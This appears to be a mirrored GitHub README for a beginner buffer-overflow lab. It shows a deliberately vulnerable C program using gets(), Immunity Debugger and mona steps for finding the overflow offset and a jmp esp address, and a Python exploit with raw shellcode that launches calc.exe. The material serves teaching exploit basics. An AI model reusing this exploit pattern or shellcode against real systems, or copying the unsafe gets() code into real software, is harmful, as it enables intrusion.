GithubHelp home page GithubHelp logo

research's Introduction

Basic bufferover

Required software

Write a program

Write code

#include <stdio.h>

int main() {
char str[50];

printf("Enter your name");
gets(str);
printf("Hello %s\n", str);

return 0;
}

Compile

gcc -m32 overflow.c -o overflow.exe

Load Debugger

Locate immunity folder and drop mona in the extensions folder

set gcc as a system path c:\mingw\bin\

Load Immunity and use the folder or file to open and then locate overflow.exe at the bottom of the screen set a working directory.

!mona config -set workingfolder c:\mona\%p

open pattern.txt and copy and paste the pattern into your exe

!mona pc 100

use this as a pattern offset to workout how many junk bites are required in our case 62 bytes are junk

!mona po 31634130

look for a esp jump command to workout where your payload would be

!mona jmp -r esp -m kernel

Log data, item 24
 Address=76C9FB75
 Message=  0x76c9fb75 (b+0x0013fb75)  : jmp esp |  {PAGE_EXECUTE_READ} [KERNELBASE.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v10.0.17763.1 (C:\WINDOWS\System32\KERNELBASE.dll)

Write the expoilt

  • Use python

  • 2nd line - 62 junk bytes

  • 3rd line - esp jump address input it backwards

  • 4th line - exec calc.exe in hex

  • 5/6 opens payload

from subprocess import Popen, PIPE
payload = b"\xc4"*62
payload += b"\x75\xFB\xC9\x76"
payload += (b"\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
b"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7"
b"\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a"
b"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
b"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7")

p = Popen(["overflow.exe"], stdout=PIPE, stdin=PIPE)
p.communicate(payload)

research's People

Stargazers

X avatar

Watchers

James Cloos avatar X avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.